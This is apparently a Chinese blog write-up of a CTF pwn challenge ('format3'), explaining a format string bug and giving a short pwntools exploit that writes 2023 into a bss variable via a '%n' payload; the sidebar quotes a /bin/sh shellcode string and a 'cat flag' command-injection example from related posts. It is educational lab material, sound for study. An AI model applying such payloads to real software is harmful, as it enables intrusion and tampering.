ROIS冬令营——format3(把bss段数据移至栈上)

最新推荐文章于 2024-06-17 19:55:03 发布
最新推荐文章于 2024-06-17 19:55:03 发布
阅读量65 收藏
点赞数
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fzucaicai/article/details/129113193
版权

题目

链接:https://pan.baidu.com/s/10SyKe0s9cyY6kiblH2fs8Q?pwd=trbj 
提取码:trbj

开始

首先检查保护,发现是 64位程序,没开pie,开了canary和nx保护

 

接着放到IDA查看对应的c代码

 

漏洞是非常明显的,有格式化字符串漏洞,就是要改key的值为2023,但是发现key的值不在栈上,因此我们不能直接用输入%n来修改栈上的数据,而是要把key这个数据的地址放到栈中,然后进行修改。

查看一下key变量在哪

 

可以看到key变量在bss区,地址是0x60208c。那么我们的思路就是把bss段key的地址移至栈上,然后修改key的值
(那种在栈上找三连的方法是用来改got表的,应该也能做)

首先就是找参数写入的开始位置,打开gdb直接往里面写  8个a  

发现8个a写入的位置(rdi)就是rsp的地址,那么我们就可以布置exp了
exp如下:
 

from pwn import *
elf = ELF('./format3')
io = process('./format3')
# gdb.attach(io)
context(os="linux", arch="amd64",log_level="debug")
from LibcSearcher import *

key_addr=0x60208C


io.recv()
payload=b'%2023c%8$n'+b'a'*6+p64(key_addr)
io.sendline(payload)
io.interactive()

 先往第八个参数写入数据2023(因为我们将把key的地址放在第8个参数,rsp是第6个参数)
其中b'a'*6是垃圾数据,使key_addr能写入第八个参数
 

cccsl_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
roisin-spring:用于分析临床数据Roisin Web 应用程序
06-05
服务器部署完成 roisin-settings.properties 文件将上述文件复制到 CATALINA_HOME
软路由rois
07-27
软路由器就是把不用的电脑或者比较小型不费电的电脑用来当做路由器使用,而其关键就是系统了,也就是软路由器的固件,其中比较好用的Router OS是其中之一,它的特点就是功能多,且稳定高效,适合办公室和学校使用,...
ROIS冬令营——format4
fzucaicai的博客
02-22 92
我们可以观察到0x7fffffffdec8这块地址指向的是返回地址的下一地址,我们可以泄露这个地址再减去0x8,就可以得到返回地址处的地址,在这里也就是0x7fffffffdda8。这里要说明的是返回地址的时候返回的是base+0x951,是0x951而不是0x950,应该是对齐的原因,如果用ROPgadget拿到ret的地址,在返回后门函数前加一个ret应该也能够解决问题。大致思路是修改返回地址为后门函数,也就是 把rbp的下一个地址(main+46)处修改为backdoor的地址。
ROIS冬令营——database_in
fzucaicai的博客
02-21 97
shellcode:"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"(菜得要死,直接网上找,不要学我)拿到canary和rbp后,就可以通过溢出执行shellcode啦,但是我们注意到,由于shellcode太长,溢出太短,因此我们可以把shellcode放在中,在溢出的返回地址处写入返回到shellcode的地方。个人习惯先checksec再IDA。
ROIS冬令营——database
fzucaicai的博客
02-20 70
函数的意思是从标准输入中读入最多32个字节的数据,从标准输入读取一个字节,如果小于等于 0 则说明读取失败,返回 -1(0xFFFFFFFF).如果读取到换行符 ,将换行符替换为字符串0,则返回-1,就会停止。' 意思就是分两次执行,如输入 echo hello world && cat flag,它的意思就是执行system('echo hello world') system('cat flag')变量中的字符串作为参数,将它们合并成一个新的字符串,最后将结果存储到。
2021 rois暑假集训——溢出与简单的rop链(buuctf练习)
weixin_56780239的博客
08-07 1158
2021年暑假参加集训,在buuctf上做的几道题的writeup.
基于多输出的3D卷积神经网络诊断阿尔兹海默病.pdf
09-25
数据建模:本文使用了大脑三维磁共振图像中的多个ROIs的信息,构建了一个多输出3D CNN模型,该模型可以自动学习原始图像中的特征,并将其用于阿尔兹海默疾病的诊断。 专业指导:本文主要面向专业人士,提供了一种...
ENVI遥感图像处理实验二——图像常规处理2.pdf
04-04
【遥感图像处理基础】 遥感图像预处理是遥感数据分析的重要环节,主要包括图像的裁剪、镶嵌和几何校正等步骤。这些操作的目的是为了优化...在实际操作中,理解并熟练掌握这些技术对于提高遥感数据分析的质量至关重要。
ENVI遥感图像处理实验二——图像常规处理2.docx
04-04
在遥感图像处理中,ENVI(Environment for Visualizing Images)是一个常用的软件工具,它提供了丰富的功能,包括图像裁剪、镶嵌与几何校正。...理解这些基本概念和操作对于理解和处理遥感数据至关重要。
制作安全科普馆设计方案时,哪些安全细节不容忽视?
qq_2129354861的博客
06-12 347
在数字多媒体技术的浪潮下,创新的展示方式不仅引领了展厅设计的革新,还为知识内容的传递带来了前所未有的高效与便捷。不同类型的多媒体互动装置,让展厅的展示形式变得多样,我们为了确保展示内容更加明确和有条理,就需要对内容展示区域进行划分,而根据不同的安全主题,便是安全教育馆常用的方式之一,例如按照交通安全、消防安全、网络安全等类型的分类,可以将展示区域划分为不同的主题区域,再针对不同的内容版块,来选用适合的多媒体互动装置,使观众能够更快速地找到自己感兴趣的内容。
厨房燃气安全新保障:红外点式可燃气体报警器的作用
BDjiance的博客
06-13 538
与传统的可燃气体报警器相比,点式报警器具有更高的灵敏度和更快的响应速度。通过实时监测空气中的可燃气体浓度,并在发现异常时及时发出报警信号,它有效降低了燃气泄漏和火灾事故的发生概率。同时,红外技术的应用也使得报警器具有更高的检测精度和更快的响应速度,为家庭安全提供了更加可靠的保障。例如,在某小区的居民家中,由于燃气灶使用不当导致燃气泄漏,幸运的是,家中安装了红外可燃气体报警器。其中,燃气泄漏和火灾是厨房安全的主要隐患。近年来,红外可燃气体报警器因其独特的点式报警和红外技术优势,逐渐成为厨房安全的新守护。
AWS 批量添加安全组
大鹅的博客
06-17 251
bin/bash# 定义安全组ID-宁夏 VPC:NX-NHRY-PRD-VPC vpc-xxx# 从文件中读取IP地址到数组# 循环遍历内网 IP 列表。
揭秘网络安全攻防战
waitaikong_的博客
06-17 554
随着互联网的普及,网络安全成为企业和个人关注的焦点。网络安全不仅关系到个人隐私的保护,还影响到企业的商业机密和国家的主权安全。因此,了解和掌握网络安全攻防战的相关知识,对于构建稳固的网络防御体系至关重要。网络安全攻防战是一场没有硝烟的战争,它要求我们不仅要了解当前的攻防技术,还要预见未来可能出现的新威胁,并提前做好准备。通过不断的学习和实践,我们可以提高自己在这方面的知识和技能,为保护网络安全贡献力量。未来的攻击手段将更加多样化和复杂化,防御策略也需要不断地更新和升级以应对新的挑战。
【安全函数】常用的安全函数的使用
weixin_54954007的博客
06-13 706
本文章描述常用的不安全函数与对应的安全函数的使用。不安全函数原型参考。
软件安全测评有哪些测试流程?第三方检测机构进行安全测评的好处
卓码测评
06-12 487
在今天的高科技时代,软件产品已经成为人们生活和工作的重要组成部分。然而,与其普及和深入应用的,软件安全问题也日益凸显。
如何保护云主机安全
Canon_YK的博客
06-14 543
通过对访问权限和应用程序进行精确控制,可以减少对服务器的无效访问和恶意请求,降低服务器的负载,提高性能和稳定性。首先,建立完善的白名单管理制度和流程,明确白名单的添加、删除和修改等操作权限和流程,确保白名单的准确性和有效性。其次,加强对白名单技术的培训和宣传,提高员工的安全意识和技能水平,使其能够正确理解和使用白名单技术。深信达MCK主机加固系统是基于可信计算技术,锁定工作场景、实行严格场景白名单控制,受保护的主机只能做白名单规定的事情,任何白名单之外的、陌生程序都无法运行。
网络安全等级保护基本要求解读- 安全计算环境-应用系统和数据安全
2403_84237550的博客
06-13 1817
息的难度,应保证用户的鉴别信息具有一定的复杂性,从而使身份鉴别信息。务系统的窗口,应用系统面临更多的安全威胁;别技术对应用系统的用户进行身份鉴别,且其中一种鉴别技术至少应使用。如管理用户仅需具备相关的管理操作,则无需为其分配业务操作的权限;本条款要求应用系统必须对应用系统所有用户的重要操作(如用户登录。才能明确测评的范围和对象,分析其系统的脆弱性和面临的主要安全。为了防止非授权用户对应用系统用户的身份鉴别信息进行暴力猜测,应用系统的管理员要及时将应用系统中多余的、过期的账户删除或停。
xxe漏洞学习
最新发布
2302_80097039的博客
06-17 422
就是,当时, XML数据在传输中有可能会被不法分子被,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。由此为引例,了解一下XML语言XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很像HTML语言。但是XML和HTML有明显区别如下:XML 被设计用来传输和存储数据。HTML 被设计用来显示数据
在你的回答中,原始图像上的RoIs是如何确定的?
07-17
在Mask R-CNN中,原始图像上的RoIs是通过两个步骤确定的:候选框生成和候选框筛选。 1. 候选框生成(Region Proposal Generation):这一步骤主要是生成一组候选框(通常称为候选框或者候选区域),用于覆盖可能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值